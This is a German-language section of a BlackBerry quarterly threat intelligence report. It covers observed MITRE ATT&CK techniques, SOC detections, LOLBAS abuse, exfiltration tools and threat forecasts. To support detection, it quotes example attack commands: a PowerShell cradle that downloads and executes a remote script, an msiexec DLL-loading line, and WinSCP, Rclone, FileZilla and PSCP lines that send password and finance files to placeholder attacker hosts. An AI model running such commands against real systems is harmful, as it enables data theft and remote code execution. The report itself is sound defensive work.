Mithilfe von MITRE D3FEND™ hat das BlackBerry Threat Research and Intelligence Team eine vollständige Liste von Gegenmaßnahmen für die in diesem Berichtszeitraum beobachteten Techniken erstellt, die in unserem öffentlichen GitHub verfügbar ist. Die Angreifer nutzen die drei bekanntesten Techniken, um wichtige Informationen für erfolgreiche Angriffe zu sammeln. Im Abschnitt "Angewandte Gegenmaßnahmen" werden einige Beispiele für ihre Verwendung und nützliche Informationen zur Überwachung erläutert. Die Bewertung der Auswirkungen der Gesamtheit der Techniken und Taktiken ist in dieser Abbildung zu sehen.

Abbildung 17: Beobachtete MITRE ATT&CK-Techniken, April bis Juni 2024.

Erkannte Taktiken

In diesem Berichtszeitraum gibt es zwei Taktiken mit demselben prozentualen Anteil an Beobachtungen: Privilege Escalation und Defense Evasion mit 23 %, gefolgt von Discovery mit 19 %. Dies sind die gleichen Top-Taktiken wie im vorangegangenen Berichtszeitraum.

Abbildung 18: Beobachtete MITRE ATT&CK-Taktiken, April bis Juni 2024.

CylanceMDR Daten

In diesem Abschnitt des Berichts werden die interessantesten Bedrohungsentdeckungen hervorgehoben, die in CylanceMDR Kundenumgebungen, die in diesem Berichtszeitraum von einer Bedrohung betroffen waren.

CylanceMDR ist ein abonnementbasierter Managed Detection and Response (MDR)-Service, der eine 24x7-Überwachung bietet. Er hilft Unternehmen, ausgeklügelte Cyberbedrohungen zu stoppen, die Lücken in den Sicherheitsprogrammen der Kunden suchen. Das BlackBerry MDR-Team verfolgte im Berichtszeitraum Tausende von Warnmeldungen. Im Folgenden werden die Telemetriedaten nach Regionen aufgeschlüsselt, um einen zusätzlichen Einblick in die aktuelle Bedrohungslandschaft zu geben.

Abbildung 19: Die fünf wichtigsten CylanceMDR Ausschreibungen nach Regionen.

CylanceMDR Beobachtungen

Ähnlich wie im letzten Bericht stellte das Team von CylanceMDR auch in diesem Berichtszeitraum fest, dass Certutil in allen Regionen eine wichtige Erkennungsquelle für das Security Operations Center (SOC) bleibt.

In den Regionen Nordamerika/Lateinamerika (NALA) und EMEA haben wir außerdem einen Trend zu Aktivitäten im Zusammenhang mit "PowerShell Download"-Erkennungen festgestellt. So sahen wir beispielsweise Angreifer, die versuchten, die MITRE-Technik Ingress Tool Transfer (T1105) mit Hilfe von Download-Cradles über PowerShell wie powershell.exe -noexit -ep bypass -command IEX((New-Object System.Net.WebClient).DownloadString('hxxps://SourceofEvil/test[.]ps1')) zu erreichen.

Darüber hinaus beobachteten wir einen Anstieg der Erkennungen von Base64-kodiertem Code, der in unserem vorherigen Bericht noch nicht so häufig vorkam. Die Base64-Kodierung stellt für Bedrohungsakteure eine relativ einfache Möglichkeit dar, Code zu verschleiern, wodurch bösartiger Code getarnt wird und möglicherweise weniger leicht zu erkennen ist. Die meisten erfahrenen Analysten sind sich jedoch der Verwendung von Base64 durch Bedrohungsakteure bewusst, so dass in ausgereifteren SOCs in der Regel zusätzliche Wachsamkeit und Erkennungsfunktionen eingebaut sind, um diese Umgehungstechnik zu identifizieren.

Von besonderem Interesse in der NALA- und APAC-Region ist, dass wir in diesem Berichtszeitraum mehr Entdeckungen im Zusammenhang mit "Möglichem Msiexec-Missbrauch über DLL-Laden" beobachtet haben. Msiexec ist ein Befehlszeilen-Dienstprogramm in Windows, das in der Regel mit der Ausführung von .msi-Installationspaketen in Verbindung gebracht wird. Unser System erkennt Bedrohungsakteure, die versuchen, Msiexec zu missbrauchen, um eine bösartige DLL-Nutzlast (MITRE-Technik T1218.007) stellvertretend auszuführen. Ein Beispiel für einen solchen Befehl ist: 'C:\windows\system32\msiexec.exe /Z c:\programdata\evil.dll'.

LOLBAS Aktivität

Während des Berichtszeitraums haben wir die folgenden Aktivitäten in Bezug auf "living-off-the-land binaries, scripts and libraries" (LOLBAS) beobachtet:

  • Bitsadmin ist weiterhin der am meisten beobachtete LOLBAS.
  • Certutil liegt dicht dahinter und hat seit dem letzten Berichtszeitraum zugenommen.
  • Regsvr32, MSHTA und MOFCOMP werden zwar immer noch beobachtet, machen aber insgesamt nur einen geringen Prozentsatz aus.
Abbildung 20: LOLBAS-Aktivität, April bis Juni 2024.

Exfiltrations-Tools

In unserem letzten Bericht haben wir über Fernüberwachungs- und -verwaltungs-Tools (Remote Monitoring and Management, RMM) gesprochen und darüber, wie sie häufig von Angreifern missbraucht werden. RMM-Tools bieten eine einfache Möglichkeit für Angreifer, die Persistenz und den einfachen Zugriff aufrechtzuerhalten und Daten aus Kundenumgebungen zu exfiltrieren. Tatsächlich haben Forscher berichtet, dass RMM-Tools die am schnellsten wachsende Kategorie für Ransomware-Gruppen sind, um Daten aus Opferumgebungen zu exfiltrieren.

Um beim Thema Exfiltration zu bleiben: CylanceMDR hat in diesem Berichtszeitraum die gängigsten Tools überprüft, die in den Umgebungen unserer Kunden für die Exfiltration verwendet werden könnten (ohne RMM-Tools).

Abbildung 21: Von CylanceMDR erkannte Exfiltrationstools.

Werkzeuge

WinSCP

Beschreibung: WinSCP ist ein Dateiübertragungsclient; PuTTY ist ein sicherer Shell-Client (SSH).

Beispiel Befehlszeile: winscp.exe scp://test: P@ss123[at]EvilHost[.]com:2222/ /upload passwords.txt /defaults=auto

Hinweis: Wird üblicherweise mit einer grafischen Benutzeroberfläche (GUI) verwendet.

GEHRUNG ATT&CK ID: T1048

Rclone

Beschreibung: Rclone ist ein Befehlszeilen-Dienstprogramm, das zur Verwaltung von Inhalten auf einem Cloud-Speicher verwendet wird (d. h., es ermöglicht die Übertragung von Dateien in der Cloud)

Beispiel Befehlszeile: rclone.exe copy "\\SERVER\passwörter\ ftp:EvilCorp\files" -q --transfers 10

GEHRUNG ATT&CK ID: S1040

FileZilla

Beschreibung: FileZilla ist ein bekanntes FTP-Tool (File Transfer Protocol), das auf verschiedenen Betriebssystemen verwendet werden kann.

Beispiel Befehlszeile: filezilla.exe -u "ftp://test:p@ss1234[at]ftp.test[.]com" -e "put passwords.txt /remote_directory/pass.txt"

GEHRUNG ATT&CK ID: T1071.002

PSCP

Beschreibung: PuTTY Secure Copy Protocol (PSCP) ist ein Befehlszeilendienstprogramm für die Übertragung von Dateien und Ordnern.

Beispiel Befehlszeile: pscp.exe -P 22 C:\Finances.txt root[at]EvilDomain/tmp

GEHRUNG ATT&CK ID: T1021.004

FreeFileSync

Beschreibung: FreeFileSync ist ein Synchronisationstool, das zur Verwaltung von Backups verwendet werden kann.

Beispiel Befehlszeile: FreeFileSync.exe google_drive_sync.ffs_batch

Note: The batch file will contain information regarding the file/folder and the location of the GDrive folder e.g., <Left Path=“C:\sensitiveFiles” /> <Right Path=“D:\GoogleDriveFolder” />

GEHRUNG ATT&CK ID: T1567.002

Wichtigste Erkenntnisse

Die obige Liste der Tools ist nicht erschöpfend, da es viele Varianten von Tools gibt, die für den Zweck der Exfiltration verwendet werden. Daher ist es für Unternehmen wichtig, eine Strategie zum Schutz vor dem Einsatz von Tools zu haben, die zu einem böswilligen Zweck verwendet werden könnten.

Zu diesen Strategien können gehören:

  • Tools zur Verhinderung von Datenverlusten (DLP) zur Erkennung und Verhinderung des Verlusts, des Missbrauchs oder der Weitergabe sensibler Daten durch eine Sicherheitsverletzung sowie der unbefugten Nutzung oder Exfiltration.
  • Verschlüsselung im Ruhezustand und bei der Übertragung.
  • Zugangskontrollen.
  • "Least Privilege"-Einstellungen. Gewähren Sie nur Zugriff auf das, was benötigt wird.
  • Regelmäßige Überprüfung der Konten - wenn z. B. ein Benutzer seine Rolle ändert, hat er möglicherweise Zugriff auf Daten, die er nicht mehr benötigt.
  • Netzwerksegmentierung, denn im Falle eines Einbruchs erschweren gut definierte Netzwerksegmente seitliche Bewegungen und reduzieren die Angriffsfläche.
  • Intrusion Detection Systeme zur Überwachung des Netzverkehrs.
  • Anwendung des "Default-Deny"-Ansatzes - nur bei Bedarf aktivieren. Zum Beispiel:
    • Blockieren der Verwendung von USB-Anschlüssen oder Cloud-Speicherdiensten. (z. B. Verwendung von Gruppenrichtlinienobjekten (GPO) zur Deaktivierung der Datenübertragung über USB-Anschlüsse).
    • Ports sollten nicht öffentlich im Internet zugänglich sein (d. h. Port 22 (SSH) sollte nicht nach außen ins Internet offen sein).
    • Reduzieren Sie das Gesamtrisiko, indem Sie die Nutzung von Ports, Protokollen und Diensten einschränken.
  • Überwachung der Muster des ausgehenden Verkehrs, wie z. B:
    • Erhöhtes Verkehrsaufkommen außerhalb der normalen Betriebszeiten (Abweichung von der normalen Basislinie).
    • Ein plötzlicher Anstieg des ausgehenden Datenverkehrs über Port 22 könnte auf eine Exfiltration mit einem Tool wie pscp.exe hinweisen.
      • Wie bereits erwähnt, sollten Häfen wie der Hafen 22 einen "Default-Deny"-Ansatz anwenden, um solche Risiken zu vermeiden.
  • Platzierung von Kontrollen zur Überwachung von ausgehenden Versuchen auf Ports oder Diensten, die deaktiviert wurden.
    • Wenn sich beispielsweise ein Bedrohungsakteur Zugang zu einem Netzwerk verschafft und versucht, diese Ports oder Dienste zur Nutzung freizugeben, wird das Sicherheitsteam durch solche Kontrollen alarmiert.         

Aus der Sicht eines SOC-Analysten sind hier einige Beispiele dafür, worauf Analysten achten sollten:

Werkzeug umbenennen

Analysten müssen die häufig verwendeten Exfiltrationstools und ihre Optionen und Parameter kennen. Anhand des Rclone-Beispiels - 'rclone.exe copy "\\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10 ' - könnte ein Bedrohungsakteur dies in etwas Harmloseres umbenennen wie - 'svchost.exe copy "\\SERVER\passwords\ ftp:EvilCorp\files" -q --transfers 10'.

Datenübertragungsvolumen

Wenn ein großer Datentransfer oder ein plötzlicher Anstieg des ausgehenden Datenverkehrs auftritt, sollten Analysten dem nachgehen, insbesondere wenn der Transfer außerhalb der Hauptgeschäftszeiten stattfindet.

Anomaler Verkehr

Achten Sie auf ein unerwartetes Muster von Datenübertragungen von unbekannten IPs oder Hosts.

Analyse des Benutzerverhaltens

Achten Sie auf Muster, die von der Norm abweichen, z. B. wenn ein Benutzer auf Dateien zugreift, auf die er normalerweise nicht zugreifen müsste. Ein Beispiel wäre der Host eines Marketing-Teammitglieds, der auf die Finanzdaten eines Kunden zugreift.

Schlussfolgerungen und Prognosen

Dieser 90-Tage-Bericht, der den Zeitraum von April bis Juni 2024 abdeckt, soll Ihnen helfen, informiert und auf künftige Bedrohungen vorbereitet zu sein. Hochkarätige kriminelle Gruppen, insbesondere Ransomware-Betreiber, nutzen neue Schwachstellen aus und finden einen Wert in großen und kleinen Zielen. Wie der Bericht feststellt, beobachteten die Forscher von BlackBerry täglich durchschnittlich über 11.500 einzelne Malware-Hashes. Angesichts dieser Aktivitäten ist es von entscheidender Bedeutung, dass Sie über die neuesten Sicherheitsnachrichten für Ihre Branche und Region auf dem Laufenden bleiben.

In Anbetracht des aktuellen Stands der Cyberbedrohungen prognostizieren wir für die kommenden Monate die folgenden Bedrohungen:

Einmischung in die Wahlen
Das Jahr 2024 ist weltweit ein wichtiges Wahljahr, da etwa 60 % der Weltbevölkerung zur Wahl gehen werden. Fehlinformationen, Desinformationen und Einmischungsversuche wurden bereits das ganze Jahr über beobachtet, einschließlich Drohungen über das relativ neue Medium der
Deepfakes. Böswillige Akteure versuchen zunehmend, den Moment zu nutzen, um Verwirrung zu stiften, soziale Spaltungen zu schüren und Störungen zu verursachen. Wir gehen davon aus, dass sie ihre Kampagnen zur Verbreitung von Fake News und Fehlinformationen intensivieren und ihre Bemühungen mit jedem nahenden Wahltermin verstärken werden.

Politisch aufgeladene Phishing-Köder
Der Missbrauch von politisch aufgeladenen Beiträgen, Foren und Mailinglisten zur Verbreitung von Malware könnte bald zu einer waffenfähigen Taktik werden. Indem sie polarisierende Meinungen aus verschiedenen politischen Kreisen ausnutzen, könnten Bedrohungsakteure dieses Chaos ausnutzen, um mit Trojanern infiziertes politisches Material zu verbreiten und noch mehr Malware einzusetzen. Zu den gängigen Taktiken gehört die Erstellung von Social-Media-Beiträgen, die Desinformationen verbreiten und Millionen von Klicks, Ansichten und Beteiligungen über Social-Media-Plattformen, Instant Messenger und traditionelle Nachrichtenmedien generieren. Viele Bedrohungsakteure nutzen diese Social-Media-Aktivitäten als Köder, um Malware-Angriffe durchzuführen.

Die Bewaffnung des Chaos
Im Bereich der Cybersicherheit ist jede Art von Chaos ein fruchtbarer Boden für böswillige Akteure, die Verwirrung und Fehlinformationen ausnutzen. Ob bei Kriegen, Naturkatastrophen, IT-Ausfällen oder anderen erheblichen Unterbrechungen des normalen Kommunikations- und Datenflusses - Zeiten der Instabilität bieten Cyberkriminellen reichlich Gelegenheit. Bedrohungsakteure können solche Situationen immer wieder ausnutzen, indem sie gefälschte Phishing-E-Mails, irreführende Forenbeiträge und bösartige Software verbreiten, die sich als hilfreiche und kontextrelevante Tools ausgeben.

Ransomware-Entwicklung und KI
Angesichts der zunehmenden Aufmerksamkeit von Strafverfolgungsbehörden, Gesetzgebern und Sicherheitsexperten weltweit
werden Ransomware-Bedrohungsakteure ihre Taktiken, Techniken und Verfahren (TTPs) wahrscheinlich weiterentwickeln, um ihre Operationen fortzusetzen.

Diese Entwicklung kann die Nutzung von KI (insbesondere generative KI) beinhalten, um raffiniertere und gepanzerte Nutzlasten und Ausführungsketten zu entwickeln, die Deepfake-Technologie für fortgeschrittene und gezielte Social-Engineering-Angriffe zu nutzen, die Netzwerk- und C2-Infrastruktur zu dezentralisieren und zu anonymisieren, um die Verfolgung und Abschaltung zu umgehen, und die operative Sicherheit zu verbessern.

Besuchen Sie den BlogBlackBerry , um sich über den aktuellen Stand der Bedrohungen und Abwehrmaßnahmen im Bereich der Cybersicherheit zu informieren.

Danksagung

Dieser Bericht ist das Ergebnis der gemeinsamen Bemühungen unserer talentierten Teams und Einzelpersonen. Insbesondere möchten wir folgenden Personen unsere Anerkennung aussprechen:

Wir möchten auch dem National Cybercrime Coordination Centre der Royal Canadian Mounted Police für seinen Beitrag und seine Mitarbeit danken.  

Rechtlicher Hinweis

Die im BlackBerry Global Threat Intelligence Report enthaltenen Informationen dienen nur zu Informationszwecken. BlackBerry übernimmt keine Garantie oder Verantwortung für die Richtigkeit, Vollständigkeit und Verlässlichkeit von Aussagen oder Untersuchungen Dritter, auf die hier Bezug genommen wird. Die in diesem Bericht enthaltenen Analysen spiegeln das aktuelle Verständnis der verfügbaren Informationen durch unsere Analysten wider und können sich ändern, wenn uns zusätzliche Informationen bekannt werden. Die Leser sind selbst dafür verantwortlich, diese Informationen mit der gebotenen Sorgfalt auf ihr privates und berufliches Leben anzuwenden. BlackBerry duldet keinen böswilligen Gebrauch oder Missbrauch der in diesem Bericht enthaltenen Informationen.